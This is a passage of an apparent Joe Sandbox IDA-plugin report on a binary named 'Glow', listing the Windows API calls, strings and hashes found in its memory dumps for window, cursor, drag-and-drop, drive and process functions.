                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 003E63D3
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 003E63D9
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 003E63E9
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 003E63EF
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 003E6410
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 003E642A
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 003E6433
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003E649A
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 003E64D6
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 003E64DC
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 003E64E3
                                                                                                                                                                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 003E653A
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 003E6547
                                                                                                                                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 003E656C
                                                                                                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 003E6596
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 895679908-0
                                                                                                                                                                          • Opcode ID: b052ae8e817bf672bf03866012470d3661b79d876c8009a00f1b1664430fe652
                                                                                                                                                                          • Instruction ID: bfb7181e787a8fd91b33a65774f358f3be0598b684c6dd8e2ac3426b68bf2d51
                                                                                                                                                                          • Opcode Fuzzy Hash: b052ae8e817bf672bf03866012470d3661b79d876c8009a00f1b1664430fe652
                                                                                                                                                                          • Instruction Fuzzy Hash: 8471BF71A006159FDB21DFAACE46AAEBBF5FF58744F104628E186A25E0C774E940CF50
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00400884
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 0040088F
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040089A
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 004008A5
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 004008B0
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 004008BB
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 004008C6
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 004008D1
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 004008DC
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 004008E7
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 004008F2
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 004008FD
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00400908
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00400913
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0040091E
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00400929
                                                                                                                                                                          • GetCursorInfo.USER32(?), ref: 00400939
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040097B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215588206-0
                                                                                                                                                                          • Opcode ID: 14ecc2854654991d3677b5990ac05b6a6b7ee02e76c57d2c1655bb9dc2280ade
                                                                                                                                                                          • Instruction ID: 0f943f033fd14281074ca761e1217cc8a17d3bdaadc35fa3a9a684fe6eb51f32
                                                                                                                                                                          • Opcode Fuzzy Hash: 14ecc2854654991d3677b5990ac05b6a6b7ee02e76c57d2c1655bb9dc2280ade
                                                                                                                                                                          • Instruction Fuzzy Hash: A64142B0D083196ADB10DFBA8C8996EBFE8FF04754B50453AE11CEB291DA78D901CF95
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$kD
                                                                                                                                                                          • API String ID: 176396367-1321853956
                                                                                                                                                                          • Opcode ID: d26bceed851d9f0641612e7e5c8dc059f6c80a4e606efff00990f1beb3a14af5
                                                                                                                                                                          • Instruction ID: cdf6802f04ca4c5a1571b49963416a8d94b39c21d88efb54f5ecd12a4f3f8451
                                                                                                                                                                          • Opcode Fuzzy Hash: d26bceed851d9f0641612e7e5c8dc059f6c80a4e606efff00990f1beb3a14af5
                                                                                                                                                                          • Instruction Fuzzy Hash: 5DE12732E00576ABCB169F76C8496EDF7B4FF54710F16832AE456E7280DB30AE458790
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0
                                                                                                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 00419BA3
                                                                                                                                                                            • Part of subcall function 004180AE: ClientToScreen.USER32(?,?), ref: 004180D4
                                                                                                                                                                            • Part of subcall function 004180AE: GetWindowRect.USER32(?,?), ref: 0041814A
                                                                                                                                                                            • Part of subcall function 004180AE: PtInRect.USER32(?,?,?), ref: 0041815A
                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00419C0C
                                                                                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00419C17
                                                                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00419C3A
                                                                                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00419C81
                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00419C9A
                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00419CB1
                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00419CD3
                                                                                                                                                                          • DragFinish.SHELL32(?), ref: 00419CDA
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00419DCD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$(E$(E
                                                                                                                                                                          • API String ID: 221274066-2209318891
                                                                                                                                                                          • Opcode ID: 694a2d8c9317273a9daa6ef0ec7e2a0247298b9ca0ef824ce27a54a52618e74e
                                                                                                                                                                          • Instruction ID: a0365cc7595210514a8dac469819b0bb05244ae5de94794b84374b0138889a15
                                                                                                                                                                          • Opcode Fuzzy Hash: 694a2d8c9317273a9daa6ef0ec7e2a0247298b9ca0ef824ce27a54a52618e74e
                                                                                                                                                                          • Instruction Fuzzy Hash: A561AB71508301AFC301EF60CC85E9FBBE8FF89750F00492EF595962A1DB74AA49CB56
                                                                                                                                                                          APIs
                                                                                                                                                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 003A0436
                                                                                                                                                                            • Part of subcall function 003A045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0045170C,00000FA0,CCD40A85,?,?,?,?,003C2733,000000FF), ref: 003A048C
                                                                                                                                                                            • Part of subcall function 003A045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003C2733,000000FF), ref: 003A0497
                                                                                                                                                                            • Part of subcall function 003A045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003C2733,000000FF), ref: 003A04A8
                                                                                                                                                                            • Part of subcall function 003A045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 003A04BE
                                                                                                                                                                            • Part of subcall function 003A045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003A04CC
                                                                                                                                                                            • Part of subcall function 003A045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003A04DA
                                                                                                                                                                            • Part of subcall function 003A045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003A0505
                                                                                                                                                                            • Part of subcall function 003A045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003A0510
                                                                                                                                                                          • ___scrt_fastfail.LIBCMT ref: 003A0457
                                                                                                                                                                            • Part of subcall function 003A0413: __onexit.LIBCMT ref: 003A0419
                                                                                                                                                                          Strings
                                                                                                                                                                          • kernel32.dll, xrefs: 003A04A3
                                                                                                                                                                          • InitializeConditionVariable, xrefs: 003A04B8
                                                                                                                                                                          • SleepConditionVariableCS, xrefs: 003A04C4
                                                                                                                                                                          • WakeAllConditionVariable, xrefs: 003A04D2
                                                                                                                                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 003A0492
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                          • API String ID: 66158676-1714406822
                                                                                                                                                                          • Opcode ID: 2b3e4956362224c4a63072fe6e7d7d01cb597297dfe3e90f9d6d95bb5f72485c
                                                                                                                                                                          • Instruction ID: 1a4f236dfb8b3179952a3bbc049f291ebdab8786954f0e19d5db72176ae4c388
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b3e4956362224c4a63072fe6e7d7d01cb597297dfe3e90f9d6d95bb5f72485c
                                                                                                                                                                          • Instruction Fuzzy Hash: B1213872E457147FD71A2BA9AC06BA937E4EF0BB62F104136F90597291DF789C008E5C
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharLowerBuffW.USER32(00000000,00000000,0041DCD0), ref: 003F4F6C
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003F4F80
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003F4FDE
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003F5039
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003F5084
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003F50EC
                                                                                                                                                                            • Part of subcall function 0039FD52: _wcslen.LIBCMT ref: 0039FD5D
                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,00447C10,00000061), ref: 003F5188
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                          • API String ID: 2055661098-1000479233
                                                                                                                                                                          • Opcode ID: 77efa4eb280cdca464c192a6365723f3bba35fd04cd1f6ff1857768f59b81178
                                                                                                                                                                          • Instruction ID: 08001f238ee505005b53bea5b2349628ce3ea376de69325fa9bc0913b9cf4465
                                                                                                                                                                          • Opcode Fuzzy Hash: 77efa4eb280cdca464c192a6365723f3bba35fd04cd1f6ff1857768f59b81178
                                                                                                                                                                          • Instruction Fuzzy Hash: 9FB11231608706AFC712EF28C890A7AB7E5EFA5724F51491DF796C7291DB30E844CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040BBF8
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0040BC10
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0040BC34
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040BC60
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0040BC74
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0040BC96
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040BD92
                                                                                                                                                                            • Part of subcall function 003F0F4E: GetStdHandle.KERNEL32(000000F6), ref: 003F0F6D
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040BDAB
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040BDC6
                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0040BE16
                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 0040BE67
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040BE99
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040BEAA
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040BEBC
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040BECE
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040BF43
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2178637699-0
                                                                                                                                                                          • Opcode ID: 39c950d0b6490322ca7bdb510a3a867e92d439bb2ca56ace106e65d932a88ccf
                                                                                                                                                                          • Instruction ID: 3d5a4a51dfe2d4a0449bf59aa1500cb0bdbb6150950bc4472473a4e8af3355c3
                                                                                                                                                                          • Opcode Fuzzy Hash: 39c950d0b6490322ca7bdb510a3a867e92d439bb2ca56ace106e65d932a88ccf
                                                                                                                                                                          • Instruction Fuzzy Hash: 91F18B716043019FC715EF24C891B6ABBE5EF85310F14896EF8859F2A2CB74EC45CB9A
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0041DCD0), ref: 00404B18
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00404B2A
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0041DCD0), ref: 00404B4F
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,0041DCD0), ref: 00404B9B
                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028,?,0041DCD0), ref: 00404C05
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000009), ref: 00404CBF
                                                                                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00404D25
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00404D4F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                          • API String ID: 354098117-199464113
                                                                                                                                                                          • Opcode ID: cc6f08e8435feebd05ae8a98b3541feb82854f820baf44686f4671031ea04a4c
                                                                                                                                                                          • Instruction ID: afbb36fa0d226031d18f8e651aab45ad61b37336719e59f434769d47669e3fc1
                                                                                                                                                                          • Opcode Fuzzy Hash: cc6f08e8435feebd05ae8a98b3541feb82854f820baf44686f4671031ea04a4c
                                                                                                                                                                          • Instruction Fuzzy Hash: 32124DB1A00115EFDB14DF94C884EAEB7B5FF85314F2480A9FA05AB291D735ED42CBA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemCount.USER32(004529C0), ref: 003C3F72
                                                                                                                                                                          • GetMenuItemCount.USER32(004529C0), ref: 003C4022
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 003C4066
                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 003C406F
                                                                                                                                                                          • TrackPopupMenuEx.USER32(004529C0,00000000,?,00000000,00000000,00000000), ref: 003C4082
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003C408E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 36266755-4108050209
                                                                                                                                                                          • Opcode ID: cb75a5baf64b7b56f6f9f36f67c467701682d42ef08aee85be099ef1eb542121
                                                                                                                                                                          • Instruction ID: c6ecca6f1aca24e6c82dab8e3608d9498c4e3dc1ab3a909d5ef71dbbbfb56410
                                                                                                                                                                          • Opcode Fuzzy Hash: cb75a5baf64b7b56f6f9f36f67c467701682d42ef08aee85be099ef1eb542121
                                                                                                                                                                          • Instruction Fuzzy Hash: 0B712671A44315BEEB229F29DC49FEABF69FF04764F10421AF514AA2E0C7B1AD10CB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(00000000,?), ref: 00417823
                                                                                                                                                                            • Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A
                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00417897
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004178B9
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004178CC
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 004178ED
                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00380000,00000000), ref: 0041791C
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00417935
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0041794E
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00417955
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0041796D
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00417985
                                                                                                                                                                            • Part of subcall function 00382234: GetWindowLongW.USER32(?,000000EB), ref: 00382242
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                          • String ID: 0$tooltips_class32
                                                                                                                                                                          • API String ID: 2429346358-3619404913
                                                                                                                                                                          • Opcode ID: 45b50b85cf4f785c32a697616ca8cc5d9508fdbe5361aa8e9160db900f8cb5c8
                                                                                                                                                                          • Instruction ID: 3144eb253c554b1abcd94962b4d3e0b3d436fd44c1e686e252b00b99cfccd562
                                                                                                                                                                          • Opcode Fuzzy Hash: 45b50b85cf4f785c32a697616ca8cc5d9508fdbe5361aa8e9160db900f8cb5c8
                                                                                                                                                                          • Instruction Fuzzy Hash: BF7159B0644345AFE721DF18CC48BABBBF9EB89300F14446EF98587361C778A946CB19
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00381802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00381488,?,00000000,?,?,?,?,0038145A,00000000,?), ref: 00381865
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00381521
                                                                                                                                                                          • KillTimer.USER32(00000000,?,?,?,?,0038145A,00000000,?), ref: 003815BB
                                                                                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 003C29B4
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0038145A,00000000,?), ref: 003C29E2
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0038145A,00000000,?), ref: 003C29F9
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0038145A,00000000), ref: 003C2A15
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 003C2A27
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
